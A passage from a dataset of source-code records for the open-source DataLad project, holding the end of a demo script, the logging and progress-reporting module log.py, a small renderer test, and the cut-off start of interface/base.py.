how DataLad re-obtains all required data, re-runs the code, and checks that none of the results changed and need saving\"\nrun \"datalad rerun\"\n\nsay \"Reproduced!\"\n\nsay \"This dataset could now be published and enable anyone to replicate the exact same analysis. Public data for the win!\"\n" }, { "alpha_fraction": 0.5845750570297241, "alphanum_fraction": 0.5886815786361694, "avg_line_length": 36.11030578613281, "blob_id": "8430fecb8c034b1733fdc193878d760f6a62fcae", "content_id": "646b9cdeb7dcb2ba1d4b5221dabb4c9782342fbc", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25573, "license_type": "permissive", "max_line_length": 99, "num_lines": 689, "path": "/datalad/log.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Logging setup and utilities, including progress reporting\"\"\"\n\nfrom contextlib import contextmanager\nfrom functools import partial\nimport inspect\nimport logging\nimport os\nimport sys\nimport platform\nimport random\nimport logging.handlers\nimport warnings\n\nfrom os.path import basename, dirname\n\nfrom collections import defaultdict\n\nfrom .utils import is_interactive, optional_args\nfrom .support import ansi_colors as colors\n\n__all__ = [\n 'ColorFormatter',\n 'LoggerHelper',\n 'filter_noninteractive_progress',\n 'log_progress',\n 'with_progress',\n 'with_result_progress',\n]\n\n# Snippets from traceback borrowed from duecredit which was borrowed from\n# PyMVPA upstream/2.4.0-39-g69ad545 MIT license (the same copyright as DataLad)\n\n\ndef mbasename(s):\n \"\"\"Returns an expanded basename, if the filename is deemed not informative\n\n A '.py' extension is stripped from file name, and the containing directory\n is prepended for too generic file names like 'base', '__init__', and 'utils'\n\n Parameters\n ----------\n s: str\n Platform-native path\n\n Returns\n -------\n str\n \"\"\"\n base = basename(s)\n if base.endswith('.py'):\n base = base[:-3]\n if base in set(['base', '__init__', 'utils']):\n base = basename(dirname(s)) + '.' + base\n return base\n\n\nclass TraceBack(object):\n \"\"\"Customizable traceback for inclusion debug log messages\n \"\"\"\n\n def __init__(self, limit=100, collide=False):\n \"\"\"\n Parameters\n ----------\n collide : bool\n if True, deduplicate a subsequent message by replacing a common\n prefix string with an ellipsis.\n \"\"\"\n self.__prev = \"\"\n self.limit = limit\n self.collide = collide\n\n # delayed imports and preparing the regex substitution\n if collide:\n import re\n self.__prefix_re = re.compile('>[^>]*$')\n else:\n self.__prefix_re = None\n\n def _extract_stack(self, limit=None):\n \"\"\"Call traceback.extract_stack() with limit parameter\n\n Parameters\n ----------\n limit: int, optional\n Limit stack trace entries (starting from the invocation point)\n if limit is positive, or to the last `abs(limit)` entries.\n If limit is omitted or None, all entries are printed.\n\n Returns\n -------\n traceback.StackSummary\n \"\"\"\n import traceback\n return traceback.extract_stack(limit=limit)\n\n def __call__(self):\n # get the stack description. All but the last three items, which\n # represent the entry into this utility rather than the traceback\n # relevant for the caller\n ftb = self._extract_stack(limit=self.limit + 10)[:-3]\n # each item in `ftb` is\n # (filename, line, object, code-on-line)\n # so entries is a list of (filename, line)\n entries = [\n [mbasename(x[0]), str(x[1])] for x in ftb\n # the last entry in the filtered list will always come from\n # this datalad/log.py facility, where the log record\n # was emitted, it is not meaningful to always show a constant\n # trailing end of the traceback\n # more generally, we are hardly ever interested in traceback\n # pieces from this file\n if x[0] != __file__\n ]\n # remove more \"uninformative\" levels of the stack, given the space\n # constraints of a log message\n entries = [\n e for e in entries\n if e[0] not in ('unittest', 'logging.__init__')\n ]\n\n if len(entries) > self.limit:\n sftb = '…>'\n entries = entries[-self.limit:]\n else:\n sftb = ''\n\n if not entries:\n return \"\"\n\n # let's make it more concise\n entries_out = [entries[0]]\n for entry in entries[1:]:\n # if the current filename is the same as the last one on the stack\n # only append the line number to save space\n if entry[0] == entries_out[-1][0]:\n entries_out[-1][1] += ',%s' % entry[1]\n else:\n entries_out.append(entry)\n\n # format the traceback in a compact form\n sftb += '>'.join(\n ['%s:%s' % (mbasename(x[0]), x[1]) for x in entries_out]\n )\n\n if self.collide:\n # lets remove part which is common with previous invocation\n prev_next = sftb\n common_prefix = os.path.commonprefix((self.__prev, sftb))\n common_prefix2 = self.__prefix_re.sub('', common_prefix)\n\n if common_prefix2 != \"\":\n sftb = '…' + sftb[len(common_prefix2):]\n self.__prev = prev_next\n\n return sftb\n\n\nclass MemoryInfo(object):\n def __init__(self):\n try:\n from psutil import Process\n process = Process(os.getpid())\n self.memory_info = process.memory_info \\\n if hasattr(process, 'memory_info') \\\n else process.get_memory_info\n except:\n self.memory_info = None\n\n\n def __call__(self):\n \"\"\"Return utilization of virtual memory\n\n Generic implementation using psutil\n \"\"\"\n if not self.memory_info:\n return \"RSS/VMS: N/A\"\n mi = self.memory_info()\n # in later versions of psutil mi is a named tuple.\n # but that is not the case on Debian squeeze with psutil 0.1.3\n rss = mi[0] / 1024\n vms = mi[1] / 1024\n vmem = (rss, vms)\n\n try:\n return \"RSS/VMS: %d/%d kB\" % vmem\n except:\n return \"RSS/VMS: %s\" % str(vmem)\n\n# Recipe from http://stackoverflow.com/questions/384076/how-can-i-color-python-logging-output\n# by Brandon Thomson\n# Adjusted for automagic determination whether coloring is needed and\n# prefixing of multiline log lines\nclass ColorFormatter(logging.Formatter):\n\n def __init__(self, use_color=None, log_name=False, log_pid=False):\n if use_color is None:\n # if 'auto' - use color only if all streams are tty\n use_color = is_interactive()\n self.use_color = use_color and platform.system() != 'Windows' # don't use color on windows\n msg = colors.format_msg(self._get_format(log_name, log_pid),\n self.use_color)\n log_env = os.environ.get('DATALAD_LOG_TRACEBACK', '')\n collide = log_env == 'collide'\n # if an integer level is given, we add one level to make the behavior\n # more natural. The last frame will always be where the log record\n # was emitted by out handler. However, user is more interested in the\n # location where the log message originates.\n # Saying DATALAD_LOG_TRACEBACK=1 will give that in most cases, with\n # this internal increment\n limit = 100 if collide else int(log_env) + 1 if log_env.isdigit() else 100\n self._tb = TraceBack(collide=collide, limit=limit) if log_env else None\n\n self._mem = MemoryInfo() if os.environ.get('DATALAD_LOG_VMEM', '') else None\n logging.Formatter.__init__(self, msg)\n\n def _get_format(self, log_name=False, log_pid=False):\n from datalad import cfg\n from datalad.config import anything2bool\n show_timestamps = anything2bool(cfg.get('datalad.log.timestamp', False))\n return ((\"\" if not show_timestamps else \"$BOLD%(asctime)-15s$RESET \") +\n (\"%(name)-15s \" if log_name else \"\") +\n (\"{%(process)d}\" if log_pid else \"\") +\n \"[%(levelname)s] \"\n \"%(message)s \")\n\n def format(self, record):\n # safety guard if None was provided\n if record.msg is None:\n record.msg = \"\"\n else:\n # to avoid our logger puking on receiving exception instances etc.\n # .getMessage, used to interpolate it, would cast it to str anyways\n # and thus not puke\n record.msg = str(record.msg)\n if record.msg.startswith('| '):\n # If we already log smth which supposed to go without formatting, like\n # output for running a command, just return the message and be done\n return record.msg\n\n levelname = record.levelname\n\n if self.use_color and levelname in colors.LOG_LEVEL_COLORS:\n record.levelname = colors.color_word(\n \"{:7}\".format(levelname),\n colors.LOG_LEVEL_COLORS[levelname],\n force=True)\n record.msg = record.msg.replace(\"\\n\", \"\\n| \")\n if self._tb:\n if not getattr(record, 'notraceback', False):\n record.msg = self._tb() + \" \" + record.msg\n if self._mem:\n record.msg = \"%s %s\" % (self._mem(), record.msg)\n\n return logging.Formatter.format(self, record)\n\n\nclass ProgressHandler(logging.Handler):\n from datalad.ui import ui\n\n def __init__(self, other_handler=None):\n super(self.__class__, self).__init__()\n self._other_handler = other_handler\n self.pbars = {}\n\n def close(self):\n if self._other_handler:\n self._other_handler.close()\n super().close()\n\n def emit(self, record):\n from datalad.ui import ui\n if not hasattr(record, 'dlm_progress'):\n self._clear_all()\n self._other_handler.emit(record)\n self._refresh_all()\n return\n maint = getattr(record, 'dlm_progress_maint', None)\n if maint == 'clear':\n return self._clear_all()\n elif maint == 'refresh':\n return self._refresh_all()\n pid = getattr(record, 'dlm_progress')\n update = getattr(record, 'dlm_progress_update', None)\n # would be an actual message, not used ATM here,\n # and the record not passed to generic handler ATM\n # (filtered away by NoProgressLog)\n # so no final message is printed\n # msg = record.getMessage()\n if pid not in self.pbars:\n # this is new\n pbar = ui.get_progressbar(\n label=getattr(record, 'dlm_progress_label', ''),\n unit=getattr(record, 'dlm_progress_unit', ''),\n total=getattr(record, 'dlm_progress_total', None,),\n )\n pbar.start(initial=getattr(record, 'dlm_progress_initial', 0))\n self.pbars[pid] = pbar\n elif update is None:\n # not an update -> done\n # TODO if the other logging that is happening is less frontpage\n # we may want to actually \"print\" the completion message\n self.pbars.pop(pid).finish()\n else:\n # Check for an updated label.\n label = getattr(record, 'dlm_progress_label', None)\n if label is not None:\n self.pbars[pid].set_desc(label)\n # an update\n self.pbars[pid].update(\n update,\n increment=getattr(record, 'dlm_progress_increment', False),\n total=getattr(record, 'dlm_progress_total', None))\n\n def _refresh_all(self):\n for pb in self.pbars.values():\n pb.refresh()\n\n def _clear_all(self):\n # remove the progress bar\n for pb in self.pbars.values():\n pb.clear()\n\n\ndef filter_noninteractive_progress(logger, record):\n \"\"\"Companion of log_progress() to suppress undesired progress logging\n\n This filter is to be used with a log handler's addFilter() method\n for the case of a non-interactive session (e.g., pipe to log file).\n\n It inspects the log record for `dlm_progress_noninteractive_level`\n keys that can be injected via log_progress(noninteractive_level=).\n\n If a log-level was declared in this fashion, it will be evaluated\n against the logger's effective level, and records are discarded\n if their level is too low. If no log-level was declared, a log record\n passes this filter unconditionally.\n\n Parameters\n ----------\n logger: logging.Logger\n The logger instance whose effective level to check against.\n record:\n The log record to inspect.\n\n Returns\n -------\n bool\n \"\"\"\n level = getattr(record, \"dlm_progress_noninteractive_level\", None)\n return level is None or level >= logger.level\n\n\ndef log_progress(lgrcall, pid, *args, **kwargs):\n \"\"\"Emit progress log messages\n\n This helper can be used to handle progress reporting without having\n to maintain display mode specific code.\n\n Typical progress reporting via this function involves three types of\n calls:\n\n 1. Start reporting progress about a process\n 2. Update progress information about a process\n 3. Report completion of a process\n\n In order to be able to associate all three steps with a particular process,\n the `pid` identifier is used. This is an arbitrary string that must be\n chosen to be unique across all different, but simultaneously running\n progress reporting activities within a Python session. For many practical\n purposes this can be achieved by, for example, including path information\n in the identifier.\n\n To initialize a progress report this function is called without an\n `update` parameter. To report a progress update, this function is called\n with an `update` parameter. To finish a reporting on a particular activity\n a final call without an `update` parameter is required.\n\n\n Parameters\n ----------\n lgrcall : callable\n Something like lgr.debug or lgr.info\n pid : str\n Some kind of ID for the process the progress is reported on.\n *args : str\n Log message, and potential arguments\n total : int\n Max progress quantity of the process.\n label : str\n Process description. Should be very brief, goes in front of progress bar\n on the same line.\n unit : str\n Progress report unit. Should be very brief, goes after the progress bar\n on the same line.\n update : int\n To (or by) which quantity to advance the progress. Also see `increment`.\n increment : bool\n If set, `update` is interpreted as an incremental value, not absolute.\n initial : int\n If set, start value for progress bar\n noninteractive_level : int, optional\n In a non-interactive session where progress bars are not displayed,\n only log a progress report, if a logger's effective level includes the\n specified level. This can be useful logging all progress is inappropriate\n or too noisy for a log.\n maint : {'clear', 'refresh'}\n This is a special attribute that can be used by callers that are not\n actually reporting progress, but need to ensure that their (console)\n output does not interfere with any possibly ongoing progress reporting.\n Setting this attribute to 'clear' will cause the central ProgressHandler\n to temporarily stop the display of any active progress bars. With\n 'refresh', all active progress bars will be redisplayed. After a 'clear'\n individual progress bars would be reactivated upon the next update log\n message, even without an explicit 'refresh'.\n \"\"\"\n d = dict(\n # inject progress-related result properties as extra data\n {'dlm_progress_{}'.format(n): v for n, v in kwargs.items()\n # initial progress might be zero, but not sending it further\n # would signal to destroy the progress bar, hence test for 'not None'\n if v is not None},\n dlm_progress=pid)\n lgrcall(*args, extra=d)\n\n\n@optional_args\ndef with_result_progress(fn, label=\"Total\", unit=\" Files\", log_filter=None):\n \"\"\"Wrap a progress bar, with status counts, around a function.\n\n Parameters\n ----------\n fn : generator function\n This function should accept a collection of items as a\n positional argument and any number of keyword arguments. After\n processing each item in the collection, it should yield a status\n dict.\n log_filter : callable, optional\n If defined, only result records for which callable evaluates to True will be\n passed to log_progress\n\n label, unit : str\n Passed to log.log_progress.\n\n Returns\n -------\n A variant of `fn` that shows a progress bar. Note that the wrapped\n function is not a generator function; the status dicts will be\n returned as a list.\n \"\"\"\n # FIXME: This emulates annexrepo.ProcessAnnexProgressIndicators. It'd be\n # nice to rewire things so that it could be used directly.\n\n def count_str(count, verb, omg=False):\n if count:\n msg = \"{:d} {}\".format(count, verb)\n if omg:\n msg = colors.color_word(msg, colors.RED)\n return msg\n\n\n base_label = label\n\n def _wrap_with_result_progress_(items, *args, **kwargs):\n counts = defaultdict(int)\n\n pid = \"%s:%s\" % (fn, random.randint(0, 100000))\n\n label = base_label\n log_progress(lgr.info, pid,\n \"%s: starting\", label,\n total=len(items), label=label, unit=unit,\n noninteractive_level=5)\n\n for res in fn(items, *args, **kwargs):\n if not (log_filter and not log_filter(res)):\n counts[res[\"status\"]] += 1\n count_strs = (count_str(*args)\n for args in [(counts[\"notneeded\"], \"skipped\", False),\n (counts[\"error\"], \"failed\", True)])\n if counts[\"notneeded\"] or counts[\"error\"]:\n label = \"{} ({})\".format(\n base_label,\n \", \".join(filter(None, count_strs)))\n\n log_progress(\n lgr.error if res[\"status\"] == \"error\" else lgr.info,\n pid,\n \"%s: processed result%s\", base_label,\n \" for \" + res[\"path\"] if \"path\" in res else \"\",\n label=label, update=1, increment=True,\n noninteractive_level=5)\n yield res\n log_progress(lgr.info, pid, \"%s: done\", base_label,\n noninteractive_level=5)\n\n def _wrap_with_result_progress(items, *args, **kwargs):\n return list(_wrap_with_result_progress_(items, *args, **kwargs))\n\n return _wrap_with_result_progress_ \\\n if inspect.isgeneratorfunction(fn) \\\n else _wrap_with_result_progress\n\n\ndef with_progress(items, lgrcall=None, label=\"Total\", unit=\" Files\"):\n \"\"\"Wrap a progress bar, with status counts, around an iterable.\n\n Parameters\n ----------\n items : some iterable\n lgrcall: callable\n Callable for logging. If not specified - lgr.info is used\n label, unit : str\n Passed to log.log_progress.\n\n Yields\n ------\n Items of it while displaying the progress\n \"\"\"\n pid = \"with_progress-%d\" % random.randint(0, 100000)\n base_label = label\n if lgrcall is None:\n lgrcall = lgr.info\n\n label = base_label\n log_progress(lgrcall, pid,\n \"%s: starting\", label,\n total=len(items), label=label, unit=unit,\n noninteractive_level=5)\n\n for item in items:\n # Since we state \"processed\", and actual processing might be happening\n # outside on the yielded value, we will yield before stating that\n yield item\n log_progress(\n lgrcall,\n pid,\n \"%s: processed\", base_label,\n label=label, update=1, increment=True,\n noninteractive_level=5)\n log_progress(lgr.info, pid, \"%s: done\", base_label, noninteractive_level=5)\n\n\n@contextmanager\ndef no_progress():\n \"\"\"Context manager to clear progress bars for the duration of the context\"\"\"\n log_progress(lgr.info, None, 'Clear progress bars', maint='clear',\n noninteractive_level=5)\n yield\n log_progress(lgr.info, None, 'Refresh progress bars', maint='refresh',\n noninteractive_level=5)\n\n\nclass LoggerHelper(object):\n \"\"\"Helper to establish and control a Logger\"\"\"\n\n def __init__(self, name='datalad', logtarget=None):\n \"\"\"\n\n Parameters\n ----------\n name :\n logtarget : string, optional\n If we want to use our logger for other log targets, while having\n a uniform control over them\n \"\"\"\n self.name = name\n self.logtarget = logtarget\n self.lgr = logging.getLogger(logtarget if logtarget is not None else name)\n\n def _get_config(self, var, default=None):\n from datalad import cfg\n return cfg.get(self.name.lower() + '.log.' + var, default)\n\n def set_level(self, level=None, default='INFO'):\n \"\"\"Helper to set loglevel for an arbitrary logger\n\n By default operates for 'datalad'.\n TODO: deduce name from upper module name so it could be reused without changes\n \"\"\"\n if level is None:\n # see if nothing in the environment\n level = self._get_config('level')\n if level is None:\n level = default\n\n try:\n # it might be a string which still represents an int\n log_level = int(level)\n except ValueError:\n # or a string which corresponds to a constant;)\n log_level = getattr(logging, level.upper())\n\n self.lgr.setLevel(log_level)\n # and set other related/used loggers to the same level to prevent their\n # talkativity, if they are not yet known to this python session, so we\n # have little chance to \"override\" possibly set outside levels\n for dep in ('git',):\n if dep not in logging.Logger.manager.loggerDict:\n logging.getLogger(dep).setLevel(log_level)\n\n def get_initialized_logger(self, logtarget=None):\n \"\"\"Initialize and return the logger\n\n Parameters\n ----------\n logtarget: {'stderr', str }, optional\n Where to direct the logs. 'stderr' stands for the standard stream.\n Any other string is considered a filename. Multiple entries could be\n specified comma-separated\n\n Returns\n -------\n logging.Logger\n \"\"\"\n if not logtarget:\n logtarget = self._get_config('target', 'stderr')\n\n # Allow for multiple handlers being specified, comma-separated\n if ',' in logtarget:\n for handler_ in logtarget.split(','):\n self.get_initialized_logger(logtarget=handler_)\n return self.lgr\n\n if logtarget.lower() == 'stderr':\n loghandler = logging.StreamHandler(sys.stderr)\n use_color = is_interactive() # explicitly decide here\n elif logtarget.lower() == 'stdout':\n warnings.warn(\"'stdout' was discontinued as valid log target and \"\n \"will be ignored.\", DeprecationWarning)\n else:\n # must be a simple filename\n # Use RotatingFileHandler for possible future parametrization to keep\n # log succinct and rotating\n loghandler = logging.handlers.RotatingFileHandler(logtarget)\n use_color = False\n # I had decided not to guard this call and just raise exception to go\n # out happen that specified file location is not writable etc.\n\n for names_filter in 'names', 'namesre':\n names = self._get_config(names_filter, '')\n if names:\n import re\n # add a filter which would catch those\n class LogFilter(object):\n \"\"\"A log filter to filter based on the log target name(s)\"\"\"\n def __init__(self, names):\n self.target_names = set(n for n in names.split(',')) \\\n if names_filter == 'names' \\\n else re.compile(names)\n if names_filter == 'names':\n def filter(self, record):\n return record.name in self.target_names\n else:\n def filter(self, record):\n return self.target_names.match(record.name)\n\n loghandler.addFilter(LogFilter(names))\n\n # But now improve with colors and useful information such as time\n loghandler.setFormatter(\n ColorFormatter(use_color=use_color,\n # TODO: config log.name, pid\n log_name=self._get_config(\"name\", False),\n log_pid=self._get_config(\"pid\", False),\n ))\n # logging.Formatter('%(asctime)-15s %(levelname)-6s %(message)s'))\n if is_interactive():\n phandler = ProgressHandler(other_handler=loghandler)\n phandler.filters.extend(loghandler.filters)\n self.lgr.addHandler(phandler)\n else:\n loghandler.addFilter(partial(filter_noninteractive_progress,\n self.lgr))\n self.lgr.addHandler(loghandler)\n\n self.set_level() # set default logging level\n return self.lgr\n\n\nlgr = LoggerHelper().get_initialized_logger()\n" }, { "alpha_fraction": 0.5271317958831787, "alphanum_fraction": 0.5400516986846924, "avg_line_length": 15.69565200805664, "blob_id": "b25e137ac8cd39655b4471bbd21c3649e1f21532", "content_id": "cc56f8e728eda85847b97618c26b6a5112687412", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 387, "license_type": "permissive", "max_line_length": 42, "num_lines": 23, "path": "/datalad/cli/tests/test_renderer.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from datalad.tests.utils_pytest import eq_\n\nfrom ..renderer import (\n NA_STRING,\n nadict,\n nagen,\n)\n\n\ndef test_nagen():\n na = nagen()\n eq_(str(na), NA_STRING)\n eq_(repr(na), 'nagen()')\n assert na.unknown is na\n assert na['unknown'] is na\n\n eq_(str(nagen('-')), '-')\n\n\ndef test_nadict():\n d = nadict({1: 2})\n eq_(d[1], 2)\n eq_(str(d[2]), NA_STRING)\n\n\n\n" }, { "alpha_fraction": 0.6142823696136475, "alphanum_fraction": 0.6164463758468628, "avg_line_length": 34.65797805786133, "blob_id": "fb3f318213a154602e2e62d74e98b8a59668aff6", "content_id": "019e138517abc635f14640db718c88c6cb7337c7", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34196, "license_type": "permissive", "max_line_length": 97, "num_lines": 959, "path": "/datalad/interface/base.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface generation\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport inspect\nimport logging\n\nlgr = logging.getLogger('datalad.interface.base')\n\nimport os\nimport re\nimport textwrap\nimport warnings\nfrom abc import (\n ABC,\n abstractmethod,\n)\n\nfrom functools import wraps\nfrom importlib import import_module\nfrom typing import (\n Callable,\n Dict,\n Generator,\n TypeVar,\n TYPE_CHECKING,\n)\n\nimport datalad\nfrom datalad import cfg as dlcfg\nfrom datalad.core.local.resulthooks import (\n get_jsonhooks_from_config,\n match_jsonhook2result,\n run_jsonhook,\n)\nfrom datalad.distribution.dataset import (\n Dataset,\n resolve_path,\n)\nfrom datalad.interface.common_opts import eval_params\nfrom datalad.interface.results import known_result_xfms\nfrom datalad.interface.utils import (\n get_result_filter,\n keep_result,\n render_action_summary,\n xfm_result,\n _process_results\n)\nfrom datalad.support.exceptions import (\n CapturedException,\n IncompleteResultsError,\n)\nfrom datalad.utils import get_wrapped_class\n\ndefault_logchannels = {\n '': 'debug',\n 'ok': 'debug',\n 'notneeded': 'debug',\n 'impossible': 'warning',\n 'error': 'error',\n}\nif TYPE_CHECKING:\n from .base import Interface\n\nanInterface = TypeVar('anInterface', bound='Interface')\n\n\ndef get_api_name(intfspec):\n \"\"\"Given an interface specification return an API name for it\"\"\"\n if len(intfspec) > 3:\n name = intfspec[3]\n else:\n name = intfspec[0].split('.')[-1]\n return name\n\n\ndef get_interface_groups(include_plugins=False):\n \"\"\"Return a list of command groups.\n\n Returns\n -------\n A list of tuples with the form (GROUP_NAME, GROUP_DESCRIPTION, COMMANDS).\n \"\"\"\n if include_plugins:\n warnings.warn(\"Plugins are no longer supported.\", DeprecationWarning)\n\n from .. import interface as _interfaces\n\n grps = []\n # auto detect all available interfaces and generate a function-based\n # API from them\n for _item in _interfaces.__dict__:\n if not _item.startswith('_group_'):\n continue\n grp_name = _item[7:]\n grp = getattr(_interfaces, _item)\n grps.append((grp_name,) + grp)\n return grps\n\n\ndef get_cmd_summaries(descriptions, groups, width=79):\n \"\"\"Return summaries for the commands in `groups`.\n\n Parameters\n ----------\n descriptions : dict\n A map of group names to summaries.\n groups : list of tuples\n A list of groups and commands in the form described by\n `get_interface_groups`.\n width : int, optional\n The maximum width of each line in the summary text.\n\n Returns\n -------\n A list with a formatted entry for each command. The first command of each\n group is preceded by an entry describing the group.\n \"\"\"\n cmd_summary = []\n for grp in sorted(groups, key=lambda x: x[0]):\n grp_descr = grp[1]\n grp_cmds = descriptions[grp[0]]\n\n cmd_summary.append('\\n*%s*\\n' % (grp_descr,))\n for cd in grp_cmds:\n cmd_summary.append(' %s\\n%s'\n % ((cd[0],\n textwrap.fill(\n cd[1].rstrip(' .'),\n width - 5,\n initial_indent=' ' * 6,\n subsequent_indent=' ' * 6))))\n return cmd_summary\n\n\ndef load_interface(spec):\n \"\"\"Load and return the class for `spec`.\n\n Parameters\n ----------\n spec : tuple\n For a standard interface, the first item is the datalad source module\n and the second object name for the interface.\n\n Returns\n -------\n The interface class or, if importing the module fails, None.\n \"\"\"\n lgr.log(5, \"Importing module %s \", spec[0])\n try:\n mod = import_module(spec[0], package='datalad')\n except Exception as e:\n ce = CapturedException(e)\n lgr.error(\"Internal error, cannot import interface '%s': %s\",\n spec[0], ce)\n intf = None\n else:\n intf = getattr(mod, spec[1])\n return intf\n\n\ndef get_cmd_doc(interface):\n \"\"\"Return the documentation for the command defined by `interface`.\n\n Parameters\n ----------\n interface : subclass of Interface\n \"\"\"\n intf_doc = '' if interface.__doc__ is None else interface.__doc__.strip()\n if hasattr(interface, '_docs_'):\n # expand docs\n intf_doc = intf_doc.format(**interface._docs_)\n return intf_doc\n\n\ndef dedent_docstring(text):\n \"\"\"Remove uniform indentation from a multiline docstring\"\"\"\n # Problem is that first line might often have no offset, so might\n # need to be ignored from dedent call\n if text is None:\n return None\n if not text.startswith(' '):\n lines = text.split('\\n')\n if len(lines) == 1:\n # single line, no indentation, nothing to do\n return text\n text2 = '\\n'.join(lines[1:])\n return lines[0] + \"\\n\" + textwrap.dedent(text2)\n else:\n return textwrap.dedent(text)\n\n\ndef alter_interface_docs_for_api(docs):\n \"\"\"Apply modifications to interface docstrings for Python API use.\"\"\"\n # central place to alter the impression of docstrings,\n # like removing cmdline specific sections\n if not docs:\n return docs\n docs = dedent_docstring(docs)\n # clean cmdline sections\n docs = re.sub(\n r'\\|\\| CMDLINE \\>\\>.*?\\<\\< CMDLINE \\|\\|',\n '',\n docs,\n flags=re.MULTILINE | re.DOTALL)\n # clean cmdline in-line bits\n docs = re.sub(\n r'\\[CMD:\\s.*?\\sCMD\\]',\n '',\n docs,\n flags=re.MULTILINE | re.DOTALL)\n docs = re.sub(\n r'\\[PY:\\s(.*?)\\sPY\\]',\n lambda match: match.group(1),\n docs,\n flags=re.MULTILINE | re.DOTALL)\n # select only the python alternative from argument specifications\n docs = re.sub(\n r'``([a-zA-Z0-9_,.]+)\\|\\|([a-zA-Z0-9-,.]+)``',\n lambda match: f'``{match.group(1)}``',\n docs)\n docs = re.sub(\n r'\\|\\| PYTHON \\>\\>(.*?)\\<\\< PYTHON \\|\\|',\n lambda match: match.group(1),\n docs,\n flags=re.MULTILINE | re.DOTALL)\n if 'DATALAD_SPHINX_RUN' not in os.environ:\n # remove :role:`...` RST markup for cmdline docs\n docs = re.sub(\n r':\\S+:`[^`]*`[\\\\]*',\n lambda match: ':'.join(match.group(0).split(':')[2:]).strip('`\\\\'),\n docs,\n flags=re.MULTILINE | re.DOTALL)\n # make the handbook doc references more accessible\n # the URL is a redirect configured at readthedocs\n docs = re.sub(\n r'(handbook:[0-9]-[0-9]*)',\n '\\\\1 (http://handbook.datalad.org/symbols)',\n docs)\n docs = re.sub(\n r'^([ ]*)\\|\\| REFLOW \\>\\>\\n(.*?)\\<\\< REFLOW \\|\\|',\n lambda match: textwrap.fill(match.group(2), subsequent_indent=match.group(1)),\n docs,\n flags=re.MULTILINE | re.DOTALL)\n return docs\n\n\ndef is_api_arg(arg):\n \"\"\"Return True if argument is our API argument or self or used for internal\n purposes\n \"\"\"\n return arg != 'self' and not arg.startswith('_')\n\n\ndef update_docstring_with_parameters(func, params, prefix=None, suffix=None,\n add_args=None):\n \"\"\"Generate a useful docstring from a parameter spec\n\n Amends any existing docstring of a callable with a textual\n description of its parameters. The Parameter spec needs to match\n the number and names of the callables arguments.\n \"\"\"\n from datalad.utils import getargspec\n\n # get the signature\n args, varargs, varkw, defaults = getargspec(func, include_kwonlyargs=True)\n defaults = defaults or tuple()\n if add_args:\n add_argnames = sorted(add_args.keys())\n args.extend(add_argnames)\n defaults = defaults + tuple(add_args[k] for k in add_argnames)\n ndefaults = len(defaults)\n # start documentation with what the callable brings with it\n doc = prefix if prefix else u''\n if len(args) > 1:\n if len(doc):\n if not doc.endswith('\\n'):\n doc += '\\n'\n doc += '\\n'\n doc += \"Parameters\\n----------\\n\"\n for i, arg in enumerate(args):\n if not is_api_arg(arg):\n continue\n # we need a parameter spec for each argument\n if not arg in params:\n raise ValueError(\"function has argument '%s' not described as a parameter\" % arg)\n param = params[arg]\n # validate the default -- to make sure that the parameter description is\n # somewhat OK\n defaults_idx = ndefaults - len(args) + i\n if defaults_idx >= 0:\n if param.constraints is not None:\n param.constraints(defaults[defaults_idx])\n orig_docs = param._doc\n param._doc = alter_interface_docs_for_api(param._doc)\n doc += param.get_autodoc(\n arg,\n default=defaults[defaults_idx] if defaults_idx >= 0 else None,\n has_default=defaults_idx >= 0)\n param._doc = orig_docs\n doc += '\\n'\n doc += suffix if suffix else u\"\"\n # assign the amended docs\n func.__doc__ = doc\n return func\n\n\n# TODO should export code_field and indicator, rather than have modes\n# TODO this should be a doc helper\ndef build_example(example, api='python'):\n \"\"\"Build a code example.\n\n Take a dict from a classes _example_ specification (list of dicts) and\n build a string with an api or cmd example (for use in cmd help or\n docstring).\n\n Parameters\n ----------\n api : {'python', 'cmdline'}\n If 'python', build Python example for docstring. If 'cmdline', build\n cmd example.\n\n Returns\n -------\n ex : str\n Concatenated examples for the given class.\n \"\"\"\n if api == 'python' :\n code_field='code_py'\n indicator='>'\n elif api == 'cmdline':\n code_field='code_cmd'\n indicator='%'\n else:\n raise ValueError(\"unknown API selection: {}\".format(api))\n if code_field not in example:\n # only show an example if it exist for the API\n return ''\n description = textwrap.fill(example.get('text'))\n # this indent the code snippet to get it properly rendered as code\n # we are not using textwrap.fill(), because it would not acknowledge\n # any meaningful structure/formatting of code snippets. Instead, we\n # maintain line content as is.\n code = dedent_docstring(example.get(code_field))\n needs_indicator = not code.startswith(indicator)\n code = textwrap.indent(code, ' ' * (5 if needs_indicator else 3)).lstrip()\n\n ex = \"\"\"{}::\\n\\n {}{}\\n\\n\"\"\".format(\n description,\n # disable automatic prefixing, if the example already has one\n # this enables providing more complex examples without having\n # to infer its inner structure\n '{} '.format(indicator)\n if needs_indicator\n # maintain spacing to avoid undesired relative indentation\n else '',\n code)\n\n return ex\n\n\ndef update_docstring_with_examples(cls_doc, ex):\n \"\"\"Update a commands docstring with examples.\n\n Take _examples_ of a command, build the Python examples, and append\n them to the docstring.\n\n Parameters\n ----------\n cls_doc: str\n docstring\n ex: list\n list of dicts with examples\n \"\"\"\n from 